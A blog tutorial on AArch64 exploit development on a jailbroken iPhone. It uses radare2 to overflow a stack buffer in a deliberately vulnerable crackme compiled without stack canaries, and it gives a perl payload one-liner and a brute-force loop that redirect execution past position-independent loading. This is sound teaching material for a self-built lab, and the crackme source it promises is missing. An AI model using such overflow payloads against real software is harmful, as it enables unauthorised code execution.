▄▄·       ·▄▄▄▄  ▄▄▄ .• ▌ ▄ ·. ▄• ▄▌ ▄▄·  ▄ .▄
▐█ ▌▪▪     ██▪ ██ ▀▄.▀··██ ▐███▪█▪██▌▐█ ▌▪██▪▐█
██ ▄▄ ▄█▀▄ ▐█· ▐█▌▐▀▀▪▄▐█ ▌▐▌▐█·█▌▐█▌██ ▄▄██▀▐█
▐███▌▐█▌.▐▌██. ██ ▐█▄▄▌██ ██▌▐█▌▐█▄█▌▐███▌██▌▐▀
·▀▀▀  ▀█▄▀▪▀▀▀▀▀•  ▀▀▀ ▀▀  █▪▀▀▀ ▀▀▀ ·▀▀▀ ▀▀▀ ·
    
android, iOS, web :: hacking + reverse engineering

Learning AArch64 Exploit Development on iOS with Radare2

hacking reverse engineering arm64 aarch64 mobile ios radare2

Turn your iPhone into an AArch64 (ARM64) binary exploitation learning lab! We'll set up a 64 bit ARM exploit development environment and explore memory corruption vulnerabilities on iOS using the powerful radare2 reverse engineering toolkit.

Background

Apple started using 64-bit ARM CPUs in their iPhones starting with the iPhone 5s in 2013. This device used their new (at the time) A7 chip, which like future iPhone chips on this timeline, was based on the ARMv8-A processor architecture, and uses the A64 instruction set. Some of the more interesting features of that instruction set include:

  • 31 general purpose, 64-bit registers
  • Assumed 64-bit address sizes * Support for either 32-bit or 64-bit arguments
  • No use of the program counter (PC) or stack pointer (SP) as general purpose registers
  • Dedicated zero register

Due to the popularity of these devices and the increasing availability of jailbreaks such as checkra1n at the time of this writing, iOS can make for a great environment for learning the basics of ARM64 reverse engineering and exploitation.

Note: This guide will be focused on Apple devices because I use them for testing mobile applications, and so that's what I'm usually playing with and have lying around. If you're just looking for arm64 hardware to practice on, you can do the same with a Raspberry Pi >= 3 and most modern Android devices. Many of these are also based on the ARMv8-A architecture (not to mention, often cheaper than even refurbished Apple hardware), so feel free to research the device you have in mind and see if you can use it for your lab :-)

Prerequisites

You're going to need the following things to follow along:

  • A jailbroken iPhone with an A7 or later CPU with Cydia package manager should work. If you're not sure whether or not your device can be jailbroken, you can check this site.
  • The radare2 reverse engineering framework.

I'm also assuming you're familiar with the following:

  • How to jailbreak your device and install packages through Cydia.
  • How to connect to your device via SSH from your wireless network, or through a USB mux such as iphone_tunnel.

Environment Setup

  1. Jailbreak your device, using whatever option works for your iOS version.
  2. Make sure you have the https://apt.bingner.com/ repo in Cydia and install the OpenSSH package.
  3. Install curl, and clang from the repo above using Cydia.
  4. Optional: Install some sort of text editor (nano or Vim) if you want to work exclusively on your iPhone via SSH.
  5. Download and install radare2. There are a few different ways ways you can do this. The absolute best and recommended method is to pull the latest version from github using the instructions they have listed there.

For the sake of time, you can also pull an older pre-built .deb from their repo:

curl -LO
http://cydia.radare.org/pool/main/r/radare2/radare2_3.7.1_iphoneos-arm.deb
dpkg -i radare2_3.7.1_iphoneos-arm.deb
  1. We'll be compiling our own order to set up the SDKs that we'll need, add the https://jakeashacks.net/cydia/ repo and install Theos which you can read about here.
  2. Download some iOS SDKs:
echo "export THEOS=/var/theos" >> ~/.profile
curl -LO https://github.com/theos/sdks/archive/master.zip
TMP=$(mktemp -d)
unzip master.zip -d $TMP
mv $TMP/sdks-master/*.sdk $THEOS/sdks
rm -r master.zip $TMP

And that's all we should need!

Vulnerability Overview

During program execution, an area of the process's memory called the stack is used as temporary storage for information such as local variables for the current function. The stack is also used to store a return address, which will be loaded into the program counter once the function returns. It is a LIFO data structure that grows toward lower memory addresses (the top of the stack has a lower memory address than the item at the bottom), and it is manipulated via the PUSH and POP instructions.

A stack overflow condition is a scenario in which we are able to fill the stack with arbitrary data, eventually overwriting the return address with a value we control. The end result of this is the ability to control the execution flow of the vulnerable program using input that we supply in some way. Exploitation of this type of memory corruption vulnerability can allow us to execute our own shellcode, or execute a specific function elsewhere in the target program.

Modern systems have safeguards against the simplest types of buffer overflow, and so in this post we'll be working with a contrived example in order to focus the basics. Just know that binary exploitation is a constantly evolving area, and there are specific techniques that have been developed over the years to bypass these safeguards. In fact, we'll be using one of the least sophisticated techniques (brute force), in order to bypass a common buffer overflow mitigation technique.

A Simple CrackMe

Our target for this guide will be a simple C program, which you should save as passcode.c:

This program requests a password, takes an input from STDIN using the unsafe scanf function, and then tells you the passcode is wrong :-). The program also has an interesting function called pass, which just prints the correct passcode to the console using the printf function. Some key observations:

  • The unsafe scanf function attempts to store its result into a 42 byte buffer.
  • The pass function is never called…

The goal of this exercise is to overflow that buffer and redirect program flow to the pass function to print the passcode. So, go ahead and compile it with the following on your device:

clang passcode.c -fno-stack-protector -isysroot /var/theos/sdks/iPhoneOS10.3.sdk -o passcode

Note the following arguments:

  • -fno-stack-protector - Disable stack canaries, which will make it easier to exploit this demo program.
  • -isysroot - Used to specify the location of the SDK (which you should've downloaded earlier) that we want to build our program with.

Inspecting the Binary

One of the tools that comes with radare2 is rabin2, which we will use to extract some information about the target binary:

# rabin2 -I passcode
arch     arm
binsz    51184
bintype  mach0
bits     64
canary   false
class    MACH064
crypto   false
endian   little
havecode true
intrp    /usr/lib/dyld
lang     c
linenum  false
lsyms    false
machine  v8
maxopsz  4
minopsz  4
nx       false
os       ios
pcalign  4
pic      true
relocs   false
static   false
stripped false
subsys   darwin
va       true

There's a lot of valuable information here, but the interesting lines for this exercise are the pic, canary, endian, and stripped fields– which you should read more about :-)

Next, we want to open up the binary in radare2 and analyze it using the built-in analysis functions using the -A flag.

# r2 -A passcode
[x] Analyze all flags starting with sym. and entry0 (aa)
[ ] 
[Value from 0x100007e0c to 0x100007fb5
aav: 0x100007e0c-0x100007fb5 in 0x100007e0c-0x100007fb5
aav: 0x100007e0c-0x100007fb5 in 0x100007fb8-0x100008030
Value from 0x100007fb8 to 0x100008030
aav: 0x100007fb8-0x100008030 in 0x100007e0c-0x100007fb5
aav: 0x100007fb8-0x100008030 in 0x100007fb8-0x100008030
[x] Analyze function calls (aac)
[x] Analyze len bytes of instructions for references (aar)
[x] Use -AA or aaaa to perform additional experimental analysis.
[x] Constructing a function name for fcn.* and sym.func.* functions (aan)
[0x100007ed4]>

Let's use the afl command to list all functions:

[0x100007ed4]> afl
0x100007e0c    4 144          sym._greet
0x100007e9c    1 56           sym._pass
0x100007ed4    1 44           entry0
0x100007f00    1 12           sym.imp.printf
0x100007f0c    1 12           sym.imp.scanf
0x100007f18    1 12           sym.imp.strcmp

…and the iz command to list strings from the program's data section:

[0x100007ed4]> iz
000 0x00007f60 0x100007f60  32  33 (3.__TEXT.__cstring) ascii key{c0demuch-armlab-2020-!}
001 0x00007f81 0x100007f81  20  21 (3.__TEXT.__cstring) ascii Enter the passcode: 
002 0x00007f96 0x100007f96   6   7 (3.__TEXT.__cstring) ascii %[^\n]s
003 0x00007f9d 0x100007f9d  11  12 (3.__TEXT.__cstring) ascii Great job!\n
004 0x00007fa9 0x100007fa9   7   8 (3.__TEXT.__cstring) ascii WRONG!\n

We can use the s command to seek to a specific symbol (in this case, the name of a function), and then use the pdf command to print the disassembled function:

[0x100007ed4]> s sym._pass
[0x100007e9c]> pdf
|           ;-- func.100007e9c:
/ (fcn) sym._pass 56
|   sym._pass ();
|           0x100007e9c      ff8300d1       sub sp, sp, 0x20
|           0x100007ea0      fd7b01a9       stp x29, x30, [sp, 0x10]
|           0x100007ea4      fd430091       add x29, sp, 0x10
|           0x100007ea8      080000b0       adrp x8, reloc.dyld_stub_binder ; 0x100008000
|           0x100007eac      08a10091       add x8, x8, 0x28
|           0x100007eb0      00000090       adrp x0, 0x100007000
|           0x100007eb4      00c43e91       add x0, x0, 0xfb1
|           0x100007eb8      080140f9       ldr x8, [x8]
|           0x100007ebc      e9030091       mov x9, sp
|           0x100007ec0      280100f9       str x8, [x9]
|           0x100007ec4      0f000094       bl sym.imp.printf          ; int printf(const char *format)
|           0x100007ec8      fd7b41a9       ldp x29, x30, [sp, 0x10]
|           0x100007ecc      ff830091       add sp, sp, 0x20
\           0x100007ed0      c0035fd6       ret

Exploitation

If you've ever used a tool like pattern_create.rb from Metasploit Framework, you might be familiar with the concept of De Brujin patterns. The goal is to create a string of bytes with a cyclical pattern, which you provide as input when working on a memory corruption vulnerability. The pattern allows you to calculate how many bytes are needed to overwrite a target register. In this case, that will be the program counter (PC).

Radare2 has similar functionality built-in, most easily using the ragg2 command:

$ ragg2 -P 256 -r; echo ''
AAABAACAADAAEAAFAAGAAHAAIAAJAAKA...

At this point, I want to mention that the radare2 binary itself contains a lot of the funcionality of its supporting tools, and you can actually duplicate this bahavior of ragg2 using radare2 in quiet mode, and piping the output to rax2 using this one-liner:

$ r2 -q -c 'wopD*' - | cut -d ' ' -f2 | rax2 -s; echo ''
AAABAACAADAAEAAFAAGAAHAAIAAJAAKA...

The result here should be a 256 byte pattern.

Note There are a lot situations where you can perform the work of external tools directly within r2. My suggestion is to play around with the help menus explore these options.

So, let's take that pattern of input and feed it into our program via STDIN.

# radare2 -q -c 'wopD* 10' - | cut -d ' ' -f2 | rax2 -s | ./passcode 
Enter the passcode: WRONG!
Bus error: 10

The resulting bus error tells us that we have successfully overwritten the program counter. After you cause a crash on iOS, a crash report will be created. There are a couple ways to view this, but the easiest is just to find the most recent crash file from the command line:

ls -lat /var/mobile/Library/Logs/CrashReporter/

NOTE: You can also use XCode Window -> Devices and Simulators -> Open Console to find the location of your crash report, and then note the location of the created ips file and open it with your editor. Alternatively, you can view the Crash Report on your device itself through the very well hidden path in the Settings menu of Privacy -> Analytics -> Analytics Data. Don't ask why :-)

If we take a look at the newest crash report, this is an excerpt of what we find:

Exception Type:  EXC_BAD_ACCESS (SIGBUS)
Exception Subtype: EXC_ARM_DA_ALIGN at 0x0041415341415241
VM Region Info: 0x41415341415241 is not in any region.  Bytes after previous region: 18367690227831362  
      REGION TYPE                      START - END             [ VSIZE] PRT/MAX SHRMOD  REGION DETAIL
      unused shlib __TEXT    000000021c926000-000000021de18000 [ 20.9M] r--/r-- SM=COW  ... this process
--->  
      UNUSED SPACE AT END

Termination Signal: Bus error: 10
Termination Reason: Namespace SIGNAL, Code 0xa
Terminating Process: exc handler [6172]
Triggered by Thread:  0

Thread 0 Crashed:
0   ???                           	0x0041415341415241 0 + 18367699319083585

Thread 0 crashed with ARM Thread State (64-bit):
    x0: 0x0000000000000007   x1: 0x0000000000000000   x2: 0x00000000000120a8   x3: 0x0000000101001c1b
    x4: 0x00000001006e3fa9   x5: 0x000000016f723570   x6: 0x000000000000000a   x7: 0x0000000000000000
    x8: 0x0000000100802c6c   x9: 0x00000002140c9ae0  x10: 0x00000002140c8e40  x11: 0x0000000000000002
   x12: 0x00000000fffffffd  x13: 0x0000010000000000  x14: 0x0000000000000000  x15: 0x0000000000000000
   x16: 0x0000000000000000  x17: 0x0000000000000000  x18: 0x0000000000000000  x19: 0x0000000000000000
   x20: 0x0000000000000000  x21: 0x0000000000000000  x22: 0x0000000000000000  x23: 0x0000000000000000
   x24: 0x0000000000000000  x25: 0x0000000000000000  x26: 0x0000000000000000  x27: 0x0000000000000000
   x28: 0x000000016f723618   fp: 0x415141415041414f   lr: 0x5441415341415241
    sp: 0x000000016f7235d0   pc: 0x0041415341415241 cpsr: 0x20000000

If you look at the value of the program counter or pc, you can see the value 0x0041415341415241, which is a hex representation of some characters from our pattern. This means that we now control pc, and can in theory control the flow of this program!

Our next step will be figuring out how to overwrite pc with something useful. If you look again at our use of the afl command, you will see 0x100007e9c listed as the address for the pass function.

[0x100007ed4]> afl
0x100007e0c    4 144          sym._greet
0x100007e9c    1 56           sym._pass
0x100007ed4    1 44           entry0
0x100007f00    1 12           sym.imp.printf
0x100007f0c    1 12           sym.imp.scanf
0x100007f18    1 12           sym.imp.strcmp

Now, a slightly confusing hurdle that you may run into is that a binary with the ability to debug other programs needs to be signed with the correct entitlements. What worked for me was copying the /binr/radare2/radare2_ios.xml entitlement file,and signing my radare2 binaries on my iOS device like so:

ldid -S/tmp/radare2_ios.xml

If you don't do that, you may get the following error message:

radare2 -d ~/exploit_dev/passcode
Child killed
ptrace: Cannot attach: Invalid argument
Possibly unsigned r2. Please see doc/macos.md
ERRNO: 22 (EINVAL)
Child killed
ptrace: Cannot attach: Invalid argument
Possibly unsigned r2. Please see doc/macos.md
ERRNO: 22 (EINVAL)
[w] Cannot open 'dbg:///var/root/exploit_dev/passcode' for writing.

Now that you hopefully have everything working, we can try to figure out how many bytes we need to overwrite pc.

# radare2 -e dbg.profile=/var/root/exploit_dev/input.rr2 -d passcode
= attach 7399 7399
bin.baddr 0x102b38000
Using 0x102b38000
asm.bits 64
Warning: r_bin_file_hash: file exceeds bin.hashlimit
 -- There's more than one way to skin a cat
[0x102c65000]> dc
Enter the passcode: WRONG!
EXC_BAD_ACCESS
[0x41415341415241]> 

The dr command shows the value of a register, and so we'll combine that with the wopO command, which lets us calculate the offset at which a given value occurs in our pattern.

[0x41415341415241]> wopO `dr pc`
50

What this tells us, is that the pattern 0x41415341415241 occurs at an offset of 50. That means we will need to send 50 bytes at the start of our malicious input, and the bytes after that will overwrite pc. Knowing that, we should be able to get a working exploit. We know that 100007e9c is the address of our target function, and so it may . However, as we can see in the output of rabin2, we're working with little endian mode, meaning the least significant bytes will appear first. And so, we will need to feed 9c 7e 00 00 01 into our exploit in order to correctly overwrite the pc.

The following perl one-liner should do for a proof-of-concept:

perl -e 'print "A"x50 . "\x9c\x7e\x00\x00\x01";' | ./passcode

We can confirm our exploit by running this as the input for passcode, and checking the latest crash report:

Exception Type:  EXC_BAD_ACCESS (SIGSEGV)
Exception Subtype: KERN_INVALID_ADDRESS at 0x0000000100007e9c
VM Region Info: 0x100007e9c is not in any region.  Bytes before following region: 71221604
      REGION TYPE                      START - END             [ VSIZE] PRT/MAX SHRMOD  REGION DETAIL
      UNUSED SPACE AT START
--->  
      __TEXT                 00000001043f4000-00000001043fc000 [   32K] r-x/r-x SM=COW  ..._dev/passcode

Termination Signal: Segmentation fault: 11
Termination Reason: Namespace SIGNAL, Code 0xb
Terminating Process: exc handler [7455]
Triggered by Thread:  0

Thread 0 Crashed:
0   ???                           	0x0000000100007e9c 0 + 4294999708

Thread 0 crashed with ARM Thread State (64-bit):
    x0: 0x0000000000000007   x1: 0x0000000000000000   x2: 0x00000000000120a8   x3: 0x000000010580001b
    x4: 0x00000001043fbfa9   x5: 0x000000016ba0b580   x6: 0x000000000000000a   x7: 0x0000000000000000
    x8: 0x000000010460ac6c   x9: 0x00000002140c9ae0  x10: 0x00000002140c8e40  x11: 0x0000000000000002
   x12: 0x00000000fffffffd  x13: 0x0000010000000000  x14: 0x0000000000000000  x15: 0x0000000000000000
   x16: 0x0000000000000000  x17: 0x0000000000000000  x18: 0x0000000000000000  x19: 0x0000000000000000
   x20: 0x0000000000000000  x21: 0x0000000000000000  x22: 0x0000000000000000  x23: 0x0000000000000000
   x24: 0x0000000000000000  x25: 0x0000000000000000  x26: 0x0000000000000000  x27: 0x0000000000000000
   x28: 0x000000016ba0b620   fp: 0x4141414141414141   lr: 0x0000000100007e9c
    sp: 0x000000016ba0b5e0   pc: 0x0000000100007e9c cpsr: 0x20000000

Our program counter has been overwritten to 0x0000000100007e9c, which is the value of the pass function's location in virtual memory.

So why aren't we getting our key? Well, the issue here is something that we saw in the output of rabin2, which is a technology called Position Independent Code, also known as pic or pie. In short, a Position Independent Executable can be loaded random memory locations, which means 0x0000000100007e9c is potentially not the location of our function. Well fortunately, there are still only a limited number of positions where our target function might be loaded, meaning it's brute-forceable.

So, let's try it with a loop…

while true; do perl -e 'print "A"x50 . "\x9c\x7e\x00\x00\x01";' | ./passcode; done

Sure enough, after a few seconds of our loop running, our exploit triggers and we get the following:

key{c0demuch-armlab-2020-!}

Conclusion

That's all for now! Hopefully you learned a little bit about setting up a testing environment and exploring memory corruption vulnerabilities on AArch64 using radare2. In the next post in this series, we'll cover more advanced topics.